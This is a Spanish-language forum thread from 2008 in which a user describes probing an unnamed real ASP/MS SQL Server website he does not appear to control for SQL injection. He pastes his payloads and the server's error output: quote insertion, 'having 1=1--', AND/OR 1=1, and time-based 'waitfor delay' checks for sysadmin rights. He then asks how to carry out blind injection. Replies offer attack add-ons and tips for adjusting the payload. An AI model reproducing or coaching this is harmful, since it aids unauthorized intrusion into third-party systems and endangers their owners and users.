SQL inj

Iniciado por Snap90210, 3 Marzo 2008, 03:28 AM

0 Miembros y 1 Visitante están viendo este tema.

Snap90210

Hola a ver si alguien me puede ayudar con esto  :)

Encontre una vulnerabilidad y fui siguiendo esta guia q esta en internet, pero al final sigo perdido

la SQL inj esta en id="SQL", no pongo la url xq creo q aca no se pude poner, pero si alguien la quiere se la mando x pm

##############
# Inserting a tick #
##############

id='

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


#########################
# Identify a valid page #
#########################

id=10

Returns a valid page


################################
# Insert tick after valid page #
################################

id=10'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


###############################
# Tried to enum db table/column name #
###############################

Attempt with the tick

id=10' having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' having 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Attempt without the tick

Returns the following error:

id=10 having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'having'.

/lib/class/ListaProducto.asp, line 54



##################################
# Tried the AND 1=1-- and the OR 1=1-- #
##################################

Trying the AND 1=1--

id=10 AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'AND'.

/lib/class/ListaProducto.asp, line 54



Trying the OR 1=1--

id=10 or 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'or'.

/lib/class/ListaProducto.asp, line 54


Then tried them with the ticks

id=10' AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' AND 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54

id=10' OR 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' OR 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Trying to determine if the DB is running as SA
id=10; if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--

Returned page immediately so we know it's NOT running as SA



Trying to determine if it is a member of the SysAdmin group
id=10; if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--

Returned page immediately so we know it's NOT a member of the SysAdmin group


**

Que puedo hacer ahora, una SQL blind injection ? como se realiza ? use varios programas pero ninguno parece dar resultado, me recomendaron el SQLninja, pero no lo pude hacerlo andar, alguien me dice como se podria hacer manualmente ? o recomendarme un programa y como usarlo ?

desde ya muchas gracias ..

Shutdown -r

Saludos Snap no se mucho de sql injection pero tengo aqui un programa (bueno no es un programa en si) que testea la pagina web y puedes atacarla median xss o sql, aqui te los dejo ->http://www.megaupload.com/?d=MRT122J1
IMPORTANTE: para poder usar eso necesitas el mozilla firefox, pues abres la ventana de complementos y añades hay esos dos archivitos, (como ya dije no es un programa xD).
   

Monaco


Snap90210 estoy en la misma... con MySql consigo injecciones facilmente, pero con MS SQL Server estoy perdido de como arrancar...

Tubiste algun avance??? a leer sobre Microsoft SQL no queda otra


saludos

Eazy

Proba todo lo qe dice justo despues de las palabras
Tried y Triying
[/url]

sirdarckcat

trata no comentando el resto de la query.. osea no pongas el "--" al final